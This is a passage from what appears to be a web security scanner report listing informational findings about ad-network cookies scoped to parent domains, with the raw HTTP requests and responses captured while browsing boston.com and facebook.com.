Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1342781785|check#true#1308567445|session#1308567384165-120206#1308569245; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF

Response

13.21. http://a.netmng.com/hic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

evo5_display=Lb7I6%2B93hnCmP8Ly1Y8aIz6mDQ1J3sznCNFCT7eof5ElbvVxhEDm93raeYwzidf%2FQorvxtKsBHYJrrYeSIbRYA%3D%3D; expires=Thu, 23-Jun-44591 20:42:55 GMT; path=/; domain=.netmng.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest= HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

13.22. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=aNnWgZbyg6ANFA7ubQBktbP4HyZd0X4cZcAAm53CYYYBOwVf7ZaYNS5GABWtTBPqnpscefljZcokfbviSJkNC0FL96ZaCniYYS5SnbXZcYFwZd56hLo1qjFtIBYNq9ZaGFfQjB0C4uFKV7RRQZa3O3qjygF42ZaMEJ4b32BDDZdVMg6sF1IBYw2v0Kk1oO6ZdETRitDNXBoTGFOnxg6Q62emyb9ysdZdOpagBZdlUBA6RKMgwHPMt1ofr38xf9UMXVrqeZdWOePb28Rqb4pGvWd7; path=/; domain=.tribalfusion.com; expires=Mon, 17-Oct-2011 20:42:54 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=bostonglobe&adSpace=728x90&tagKey=987828525&th=20001302335&tKey=undefined&size=728x90&flashVer=0&ver=1.20&center=1&url=http%3A%2F%2Fboston.com%2F&rurl=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=8117328&a=1&rnd=8110671 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: ANON_ID=aNnUgjyg6ANFA7ubQCktbP4HyZd0X4cZcAAm53CYYYBOwVf7ZaYNS5GABWtTBPqnpscefljZcokfbviSJkNC0FL96ZaCniYYS5SnbXZcYFwZd56hLo1qjFtIBYNq9ZaGEvQjB0C4uEKV7RRQZa3O3qjyKF42ZaMEJ4b32BDDZdVMg6tF1IBYw2v0Kk1oO6ZdETRitDNXBoTGFOnxg6Qm2emyb9ysdZdOpagBZdlUBA6RKMem3yjH2tm2TcZbG4aZbrxc

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aNnWgZbyg6ANFA7ubQBktbP4HyZd0X4cZcAAm53CYYYBOwVf7ZaYNS5GABWtTBPqnpscefljZcokfbviSJkNC0FL96ZaCniYYS5SnbXZcYFwZd56hLo1qjFtIBYNq9ZaGFfQjB0C4uFKV7RRQZa3O3qjygF42ZaMEJ4b32BDDZdVMg6sF1IBYw2v0Kk1oO6ZdETRitDNXBoTGFOnxg6Q62emyb9ysdZdOpagBZdlUBA6RKMgwHPMt1ofr38xf9UMXVrqeZdWOePb28Rqb4pGvWd7; path=/; domain=.tribalfusion.com; expires=Mon, 17-Oct-2011 20:42:54 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 1146
Expires: 0
Connection: keep-alive

document.write('<script src="http://tag.admeld.com/passback/js/610/bostonglobe/728x90/12/meld.js"><\/script>');
document.write('<script type="text/javascript">\r\nvar TFPix1723665946 = [\r\n
...[SNIP]...

13.23. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:43:03 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

13.24. http://admeld.lucidmedia.com/clicksense/admeld/match previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/
2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:44:22 GMT
Expires: Tue, 19 Jul 2011 20:44:22 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/
Content-Type: text/plain
Content-Length: 164
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3449391312096071132"/>');

13.25. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_SZJZ="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4umiKbjeSRFG1WGV7v3P2wuhddhrqwvMRjk0BenkJXocfzEwn+Nqhfv9uk/5yFLDCoDEiXP/hOV/sixRxjRF5rWB9KnHODU3B/yiV31fU9eC47+7M/+n0rHdBD4ZxTqL+i57Kfedz/cOyQJ/yqrT8WH56MJW2k/Y9CySxYR40lREQTsrWG7iHX/ZXcgbRha1qYshbnj41ek4M+T6JcKCxkbH15JB/en3mXv1AsBpaE/NatqWqHNyHQHJfAhdEnyH1+AAopspuM3siXVWxrdxhMapoJxsBhSSal7CXpZYG+uwKX6/HBBoo1QiOnTYinh15lebN38dWtzvNR2O+WFyXzCozolPtxDwm0dHcYAcuFfIr8QFcmjsXeoy54UcbFQfkl9uHXtLBbnuMbnFxbNwaHE//LzUfc5hb2GScAS+tt37fQYS17jN3hBQaRrUBkzt7rfFLMsvMHbbyYv3KfLRCE3w09MCuPqRLiZY3ytjjsY6apkPVVkOf7RGTxh3YfEL6eFDcKTCpWqfnef4KW5APHU9wMNAvLlgroCAf/NhO2U3Y/GfwP4tEvTYLJN23RLPRD8S8OCoPmsUEcTjYSdXrAa+japzdcP3mqBhAwNNo4MEXKPVwsppVJe0EX3fGU/z4laDN06Bl4R1L1Ud+xKxsSeEJJVA4fdmtNkncbfRp/AuusRsiMiJmM8wEh9cHMeuWvC/1JGAquOj+tGnyCfumeubLuDosKPCGVUatVhMm8Un4rKjml83L7IXGsViPmi+mSBR6ghqHQjD4aMO749hTnc8Y8YtOlKc7ILWPtzWq1qxsPOFXM/G/zC/lKJdZpuX37zzVp/oTsbOePRvoa6pns4A4/pYni1f1cOWO4QmossHVIGr7gqKt2dJIcAbrZspS2DHtJse2yV6D948mxs5iyfph8iLvlPiGAk70vnVSIWhOxIRAf1Hubw1TQuNP9oTufqhhBrP9GvCENRUI1T3eVdbDJcIJdZFtu6QHj8+l4WNRDiGqpozNwcSCkTIbu9FwpFhC0Hh4P0m7hqR4Kv6Lei7atV+4x3ApSzcU30KQIJYd24qeaXX0AM2NZKIsIh/PCCWU30b2w1A+4XoXLNY9hpJjWMQAk2uIG/HXtcco1ZuZjVGniEqwPjgK3X0T7ZWByLmJvp8X3Klk8GibfUeyNvNx6XGzxASGUkyGEWOfMUp9fjZ6IpP+EVsoSlBDHB+J8FDy1Tna3CDV1xsTytG+31h1s3uvGX6QIQ3GbvJENudrwhqTQb3dewEm3Rg/SAyb0xljjjF/rEoV/y1xhGU6vwWSmXhsTq0YU2p5nRFroYcOuwzmqM5qplSuVq/oPqIEHSWbSxqLpJLHzwjNOZLwAqynbTkWi6aUeO3RHvwfmwQ70KqDFHoSqXTseyacFksSkrt04Fkkh7y+uzYAwdvOl7Jd3QinEFa0FNW49rkGHj3tqQ7u6bJXw+d0dwc5+xla32jQflwdmRpSh1ssB1xZMcK7cy3AYW/iT+NpHbx"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=788D060407632FEEC1CAF36849FCD437&rsi_site=5B0808D11C7842FEE1E62BF14D546420&rsi_event=4F8AC0F46333C645B9A6CF1F71CCA4D9 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_RXmH="MLsXtSMNJjhrJoHUG+rUxPALFPJg7aBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyOT+GUT9nKm6Uzd+LOs5qvUnENSYlaK0KznMNqgeVc7u11QLOt3H88u2n9J3K7ReVCPIvh9QMt5HFcvzlWMwCQvebSXlqBAu2RernYAut1NC6VxocQ4vI6YkKntNNFsTWurWvRLDQLcNSXvlo3q/IRrdGQU1wsVK2NaCDH6IkICSQMIi0mUJ2854sQbPCwbh0hzgPeYW5npxqXDrzKYQtXwMh261gIkuwsSjlh3ol5pPB8GHLODEm8H0ER2S9bWhnjh2tYo3iNC/lc4NLR5bHSiz1gdQzMLiSEbthA1LF+XISbspf4DHmymXcR3VSpWILtnCQwQN7hPGjaSKBzHNrko/5L3bMn9pBa6iFAEYhWP9BcF1F/i/zA/mxUODAkEVqHBJAW2hZvhtGtAbh6CxHCF590BUBYG1yzKp9meiHIHCaxsD3YWnIICKbkj4roH58T0PgLLzpZOuhSmgQvfVu8lS4fXzPRPlVk46rFWtdPVp9WNUKKNnblO4g6edoZMDNTHSve9WufpCPpkNsm5knJO4jO2Rn+w4MVqWp+/RlzhctdBgy7HqD4eQ6cVjIKEu3/phNdOSm5HMW0aFbYP3TuDjvAHMFJlBK4uBkL5Y1PKDMJV52dj5ZZAw8rW7AzPEzb4IPEP16HLfxV+g2yepzhdcGw3T3txYnFBZzd5Pp3hjrZtu1U69wCo9hgxKJG+BKk6kuBNZzQueRAMNzjrbkbE8zUi6EE1/RZoy4DGKY2NX9daazQm+XxGJes3OVrmAE5MsF6ZbUehi0of52dAwKyLkhmCL0I41uDlKvplCwcn4y06lg1h7jbxNf3aAhhjP8c/nPrsQg36KnFeCdkfIkyBe2kGXVRvl0gbIf/iNINeNuQNZgSandggonOrKXUtpC6Af7g694/87YlYLxmxqqRx9r0w+v05m7jNyS0zc6f4ZMw8g4pOgMMCbuE/NbDbXCtYYYjLUCP1NPutzZg2xYvgQ7BaTNOb4I3MBo7yxdbDq2n8dfZ8mOgQ1OGRoTjXjU9n/GaPEJvnrtHTtNPwDlw3ZmdMtNM+kJOfzwCLZ25xzFca5ZW0G9Ge1SkeCpQg62Ys6Uq4APCtUoG5fHvoIbTyh/oFjx5aam/gy2De3dPig88m9TdT1MpATdXXGm3gQW08DfgV7ZZK03srjxMvr4NUW+loKQUJs7AaPLF1vHjFfaSGn/fU4s+o+p1DGLJztcBPxJYm88RhIKEWcdZGqJflCuuD6t5UPS83XK+DDraRqA+U6FmZieutO26gVCGk71RTmD9Bh7fOgp7+5TwBFn1mm6NlX1Cn9kPiPyKy00fK3p9iJ3P2xj9w6+QFqDqb6etvHf2E8vb4oyjLaTNWBh5CBPOIQMDw1plT/HCto6JhNaitu5lv0zFEiT7IBCE7WI3JLhVo+pvYrxrta2PYndn+yK79yZuGwH+5yjJuylm9VtakAAY20JjiMK8yuOQM+SOxDds0F0vprgY5Y7xH+ANu4srSuqsysS9O+fpQ7OvNJ+Er9qxA=="; rsi_us_1000000="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"; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpn3tsfwP3C13ELVR0CQCV8tpujhUfWhmS6NTgEmCnCZ++Kg6mfGQNWB4S7E4rk4kRS6EemAcxwlypsWECT4LBvY3ZVyCrts6XqdTZLTTjsU1Ta44fEsrqkF3QR8AOUEazdr73Yx/v5GsElQg2z/OxHimPEHU8H9vtdJVlTWa3RAtda3D/U67y/ubm7yMeD05sVGFPn1GloHXbGc6QArtZrs4LlIZSa0c/3WWqlPgJBCVF4jRqC3hM+vRmU6J2FYvvoyoAQBFW2qGWrCcQIr4DGDGoFFqkTIKf0vEd0h2I6LjYGgX1CvS21MywhPm/F6pyJL6pR60KkkHrWCMq8m9de56wmRRDdiuvI4U2dNhS1sPwTc8AJmULpuJf7j/y0mC8xQDfPOYuNpl9d48zBA1Db6kf5rrOZgz6Nsv6GDaVXGwPrqMpwbxTqEKyRJm4qd1YU0pC/+3cjUmDytTEVvwfzUhTic/Yr8YO74Yh1GljmAeoHUE/nBX5aURGIkYgXrs6Vc2sH3rBMi03t9mq/cL9Nj1G7oPtwlfosCDCW1s45wrzwmX1BVmtF3VeqdswFUzK7GoiF4ncwW7Thw974oEX5k9uHeLK9ubMWgFddOp5E+U1ixsBTiJzizMEic5ZimkGUiiA2SDkdPaPqcNbExXL9CUw8sCLmtGOg4b6dKWsniQFGvSsZr6SD0D6vrTL50s25Z6YG/uMCBW29BBgPISdd4nOKGOBBDGl8qd8YIQyBcJweaFIdSxXwooYodaQ4Y4xqzUi9fxCOPJydOz85nIM8KNhnKtW3HL74kCi591Z9kc08IWXL3x3rtVjY4YjjFdvlZH1bFa10yT8hjf9E2L44N2PoWw5Md/XVaVAlebEvmdjBjZ0hUKsaUOX1JzVhkBQ+KGzcx+sotktzYFcOwoEeKHZPtz5HryZmzu47uVTDhLOkBldHf+vrTGvT1QrAvsxqkQTDyPIQyQGBzDHQvl0TLZlZXMkeHlOYy2ULroOabknOi4aktm3dGtOGl+KB/AS3HyzbdCgi6BKGaN8PGmmeS9UIptYOh+SSzHDfIk1Xhl2hjQbO/ugEdqDYDzxTRBXRudZxYKFkueHvhVFlPQH83WEmQ1QD9yVKDYz8hbSfvcvIc4xblteaZg3Cr1RoeqL01TISneJPTII93k4HyMtQO9vpfkxofTWPDqHGQN0flp+qZ9RDQafFcsZZ/yMHHKtC2FnoFyZMbweX76sJrCybzpidSGnfinvvckpsBmXXqWv/WXgJq0JYZxkXmgSpOUan+W6t2NLXZQk6uBcMTaMyS6ZIRJtPwG1V5ojzmtrOP1xJjVHroOP37vmPnBK7aplXTPZ7APFyxXHub+Sh7ScDaetlyS3joMbfIhHGNBDCxxt7CMI4OkocONePsFdRy4lLyEbAB69B4uZJRgboLOgUIpb9kVC1/fb5RAacwDUEBee7IwtZ8I4i+4+Es2Vz5qkMbQsE04r8/eirLSb86MAm/Kc+2GigTWoHGK5AYrpfgPfB2AYZn7fdaAY0GB9B3W1mmPM0N2m7oUr0GzTCDA8llTSp/W++zggVRL5RNuhm4t23/CGDzIFUjHnwYa6q4lbFRwblEuM6P8Bm997Ei12i+TbSga+YKk6qJI/1rqyenbNJhmvKp+VjvEW4DWQkDwnPTRd0hx4NMbkkWHgjaogiL2OKACU7kfOe05M28O8IhCEnkgatzwM24rVjViBkVbYcIGr2s6sN4nM6JXd6Y42yYDFbOWR+7XVbVuMKJiTwYiIg+9uZ+JgSNIPedCW7IEltpSm3gGVxp1cnmwgOzdoycrFzWMjJhorPz+oofpq7CZiZwecNku6gOEQtxXSbfUjQrno=; 